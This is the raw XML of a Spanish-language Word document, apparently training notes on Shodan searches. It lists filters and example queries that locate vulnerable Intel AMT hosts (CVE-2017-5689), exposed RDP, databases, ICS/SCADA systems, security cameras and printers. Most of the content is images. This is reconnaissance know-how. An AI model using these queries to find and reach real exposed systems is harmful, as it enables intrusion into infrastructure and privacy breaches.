          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56FFE99F" w14:textId="77777777" w:rsidR="00A60635" w:rsidRPr="00A60635" w:rsidRDefault="00A60635" w:rsidP="00A60635">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60635">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Uso práct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0635" w14:paraId="4737DFC8" w14:textId="77777777" w:rsidTr="00A60635">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10790" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7EDEDA60" w14:textId="77777777" w:rsidR="00A60635" w:rsidRPr="00A60635" w:rsidRDefault="00A60635" w:rsidP="00A60635">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A60635">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>vuln:CVE-2017-5689 country:US</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47BD60D0" w14:textId="466C8A83" w:rsidR="00A60635" w:rsidRPr="00875709" w:rsidRDefault="00A60635" w:rsidP="00A60635">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:highlight w:val="yellow"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875709">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00875709">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t xml:space="preserve"> Intel AMT vulnerable en USA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D96C4E6" w14:textId="77777777" w:rsidR="00A60635" w:rsidRDefault="00A60635" w:rsidP="00A60635">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1F68AE" w14:textId="5FD834FC" w:rsidR="00A60635" w:rsidRPr="00A60635" w:rsidRDefault="00A60635">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60635">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FILTROS AVANZADOS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A851A83" w14:textId="5C3DED43" w:rsidR="00A60635" w:rsidRDefault="00C1529C" w:rsidP="00C1529C">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C1529C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>has_screenshot:true - Con captura de pantalla</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06AAEF1E" w14:textId="3A478241" w:rsidR="001A31A3" w:rsidRDefault="001A31A3" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A31A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="645CBA13" wp14:editId="527D9594">
            <wp:extent cx="4648200" cy="593506"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="5667755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5528" name="Imagen 1" descr="Interfaz de usuario gráfic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3459" cy="5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DC6" w14:textId="77777777" w:rsidR="001A31A3" w:rsidRPr="001A31A3" w:rsidRDefault="001A31A3" w:rsidP="001A31A3">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001A31A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>has_ipv6:true - Con IPv6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185EA2E2" w14:textId="548A8E4C" w:rsidR="008F2FCC" w:rsidRDefault="008F2FCC" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2FCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6281EAD3" wp14:editId="0EA0B548">
            <wp:extent cx="6858000" cy="656590"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1538761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615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962B" w14:textId="77777777" w:rsidR="008F2FCC" w:rsidRPr="008F2FCC" w:rsidRDefault="008F2FCC" w:rsidP="008F2FCC">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F2FCC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>server: - Header del servidor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423021CD" w14:textId="3011B72D" w:rsidR="008F2FCC" w:rsidRDefault="003951A3" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003951A3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="32AD186F" wp14:editId="363397D9">
            <wp:extent cx="5295900" cy="562444"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1655460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600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4031" cy="5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DBB0" w14:textId="77777777" w:rsidR="008F2FCC" w:rsidRDefault="008F2FCC" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037B79B4" w14:textId="300C50FC" w:rsidR="003951A3" w:rsidRPr="00706E2B" w:rsidRDefault="003951A3" w:rsidP="003951A3">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00706E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>2.1.5</w:t>
      </w:r>
      <w:r w:rsidR="00071B2D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="00706E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00706E2B" w:rsidRPr="00706E2B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CONSULTAS PRÁCTICAS AVANZADAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D89BABA" w14:textId="3E86FD4C" w:rsidR="008F2FCC" w:rsidRDefault="000A5327" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>🎥</w:t>
      </w:r>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 1: "Server: yawcam" "Mime-Type: text/html"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="431706AE" w14:textId="3210A25E" w:rsidR="001A31A3" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4331B8AE" wp14:editId="1BBC4F9E">
            <wp:extent cx="4978548" cy="3162300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12515625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625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496" cy="31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1855" w14:textId="4983C3E9" w:rsidR="00730C65" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5EFF9B7B" wp14:editId="69B0C4B2">
            <wp:extent cx="6858000" cy="2887345"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="13433906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0617" name="Imagen 1" descr="Captura de pantalla de computador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E95" w14:textId="77777777" w:rsidR="00730C65" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D7AC7BC" w14:textId="77777777" w:rsidR="00730C65" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40AD7A3A" w14:textId="77777777" w:rsidR="00730C65" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05724C12" w14:textId="77777777" w:rsidR="00730C65" w:rsidRDefault="00730C65" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="743D2C51" w14:textId="77777777" w:rsidR="00730C65" w:rsidRPr="00730C65" w:rsidRDefault="00730C65" w:rsidP="00730C65">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🖥️</w:t>
      </w:r>
      <w:r w:rsidRPr="00730C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 2: ESCRITORIO REMOTO (RDP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163B7E46" w14:textId="7DC9532F" w:rsidR="00730C65" w:rsidRDefault="00B96DA3" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B96DA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="648EF631" wp14:editId="5F6DCB95">
            <wp:extent cx="5493905" cy="3718560"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="12119109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09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6395" cy="37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B96DA3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F892AEF" wp14:editId="1345DE40">
            <wp:extent cx="5608320" cy="2837394"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="41204165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4165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354" cy="28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95D" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79CFDD1A" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E84F4FB" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79D2EA9A" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46957523" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D2CD7B3" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57182C71" w14:textId="77777777" w:rsidR="00D30011" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="409B6A28" w14:textId="11906328" w:rsidR="00B96DA3" w:rsidRPr="00730C65" w:rsidRDefault="00D30011" w:rsidP="00B96DA3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30011">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🗄️</w:t>
      </w:r>
      <w:r w:rsidRPr="00D30011">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 3: BASES DE DATOS EXPUESTAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B67461" w14:textId="6598A71A" w:rsidR="00B96DA3" w:rsidRDefault="00D30011" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D30011">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C4F7646" wp14:editId="4E4B44FB">
            <wp:extent cx="4579620" cy="3314712"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="9383967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967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0514" cy="33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A17F" w14:textId="1E817F03" w:rsidR="00D30011" w:rsidRDefault="00774E17" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="68F24C69" wp14:editId="0A8F508C">
            <wp:extent cx="6858000" cy="2545715"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="75045193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1933" name="Imagen 1" descr="Captura de pantalla de un celular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BBDD" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DE38523" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BC5E202" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="375E257F" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="425B612E" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D881149" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CCD0539" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="369F289F" w14:textId="77777777" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E2761C5" w14:textId="77777777" w:rsidR="00774E17" w:rsidRDefault="00774E17" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="057FC4F3" w14:textId="77777777" w:rsidR="00774E17" w:rsidRPr="00774E17" w:rsidRDefault="00774E17" w:rsidP="00774E17">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00774E17">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🏭</w:t>
      </w:r>
      <w:r w:rsidRPr="00774E17">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 4: SISTEMAS INDUSTRIALES (ICS/SCADA)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004E888A" w14:textId="4BDC593E" w:rsidR="00774E17" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F588DDB" wp14:editId="46C1A502">
            <wp:extent cx="5035369" cy="2971800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="322803031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3031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598" cy="29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669" w14:textId="4E449301" w:rsidR="00932A9C" w:rsidRDefault="00932A9C" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00932A9C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37C87D9B" wp14:editId="3A45C75F">
            <wp:extent cx="6858000" cy="2734310"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="12022146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14658" name="Imagen 1" descr="Captura de pantalla de un celular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C6FE" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DD14D54" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C65D6E3" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32DE46D7" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D101231" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F24C341" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2182CA76" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8772DB" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B5F17DC" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DFA84F" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03291BF6" w14:textId="77777777" w:rsidR="008F05B8" w:rsidRDefault="008F05B8" w:rsidP="008F05B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F05B8">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>📹</w:t>
      </w:r>
      <w:r w:rsidRPr="008F05B8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 5: CÁMARAS DE SEGURIDAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D13304" w14:textId="72248816" w:rsidR="0038681D" w:rsidRPr="008F05B8" w:rsidRDefault="0038681D" w:rsidP="008F05B8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7E85AD13" wp14:editId="1E64790C">
            <wp:extent cx="4808220" cy="2051062"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1341136468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36468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9788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068F" w14:textId="2FD8F6DA" w:rsidR="00001468" w:rsidRDefault="00983071" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00983071">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6863C0CF" wp14:editId="320908EA">
            <wp:extent cx="6858000" cy="3088640"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="17385672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7258" name="Imagen 1" descr="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68" w:rsidRPr="00001468">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="02A4E181" wp14:editId="1CF1DB78">
            <wp:extent cx="6858000" cy="2940050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="104234160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41603" name="Imagen 1" descr="Interfaz de usuario gráfic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E43C" w14:textId="77777777" w:rsidR="0038681D" w:rsidRDefault="0038681D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7481EAEE" w14:textId="77777777" w:rsidR="0038681D" w:rsidRDefault="0038681D" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BAC014A" w14:textId="77777777" w:rsidR="0038681D" w:rsidRPr="0038681D" w:rsidRDefault="0038681D" w:rsidP="0038681D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>🖨️</w:t>
      </w:r>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> EJEMPLO 6: IMPRESORAS EXPUESTAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE45DC0" w14:textId="56EE1642" w:rsidR="0038681D" w:rsidRDefault="008F03B5" w:rsidP="001A31A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008F03B5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="06D8B500" wp14:editId="4F0F3B6C">
            <wp:extent cx="5267491" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="6012694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694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8037" cy="29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40FE" w14:textId="1419E923" w:rsidR="008F03B5" w:rsidRPr="0038681D" w:rsidRDefault="008F03B5" w:rsidP="008F03B5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0038681D">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
